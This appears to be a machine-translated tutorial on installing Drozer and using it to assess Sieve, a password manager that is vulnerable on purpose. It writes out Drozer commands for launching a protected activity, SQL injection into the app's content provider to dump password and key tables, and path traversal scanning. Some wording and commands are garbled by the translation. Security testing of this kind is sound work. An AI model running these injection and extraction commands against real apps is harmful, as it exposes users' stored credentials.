0x00: Preface
There are many application flaws in Android apps, and in many cases they need to be evaluated securely, andDrozer is one of the best tools. Here an app is sieve(a password manager), and its own flaws can be used as a test sample.
0x01:
Install sieve backward to configure the password, PIN code, any need to add a password to manage the information
0x02: Installing Drozer
Tips: My platform is windows, there are several pits when installing
Download the Drozer after installation, follow up to the Drozer directory run drozer.bat, shown below is the installation success
Then in the downloaded Drozer folder there is a agent.apk file, install it on the phone and run the following
Then adb forward tcp:31415 tcp:31415 forward
The following will be displayed when running drozer console Connect
Solution:
Create a . drozer_config file under the Drozer directory that cannot be created directly under Windows. Start with the file by creating a 1 first. Drozer_config file , and then modify it with the Rename command)
Add the following lines (where the paths are Java and Javac)
[Executables]
Java=f:\java\jdk1.8.0_66\bin\java.exe
Javac=f:\java\jdk1.8.0_66\bin\javac.exe
It is created and then run, and is displayed as follows: Run successfully
(If Erron 10061 or Erron 10054 appears, see:http://blog.csdn.net/ksr12333/article/details/39181057)
0x03: Demo Drozer How to evaluate apps
(1) You can first list all package names run App.package.list-f sieve here is not all listed, with the-f keyword can filter the app you want to test
Get basic information (for example: Sieve version, permission information, user ID, group ID, data directory, etc.)
Run App.package.info-a Com.mwr.example.sieve
(2) itentify the Attack Surface (Confirm attack surface) Run App.package.attacksurface com.mwr.example.sieve
Debuggable lets us use ADB bindings to monitor the app
Start Activity run app.activity.start–-component com.mwr.example.sieve com.mwr.example.sieve.PWList( Pwlist is a password list class package, so run it)
(3) SQL injection
SQL statements can be injected into the content provider with the projection and selection parameters
Run app.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--projection ""
The error here indicates that it can be injected. Continue with run app.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--selection ""
With run app.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--projection "* from key;- command to select a specific table to list.
This is based on the Android operating system recommended to use SQLite database to store user data. The SQLite database uses SQL statements, so SQL injection is possible.
(4) get information from content provider
Run App.provider.info-a Com.mwr.example.sieve
You can see the content Provider specific information, permissions, etc.
View the URIof the Content Provider (data disclosure)
Run Scanner.provider.finduris-a Com.mwr.example.sieve
We try to view specific information run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/–-vertical
You can see the encrypted password and set the information
(5) detecting the presence of traversal file vulnerabilities
Run Scanner.provider.traversal-a Com.mwr.example.sieve
The above section is a relatively simple demonstration of the basic usage of drozer, in more detail see the official documentation:
Https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf
0x04: summary
Drozer's powerful evaluation capabilities (SQL injection detection, Content provider detection, traversal of file vulnerabilities, and the ability to capture sensitive information based on vulnerabilities) provide us with a great deal of help in handling an app, and we want to share it with all our friends who love Android security. If there is any place not written right, hope to correct.
0x05: Reference
Drozer security assessment for Android apps
Drozer--androidapp Security Assessment Tool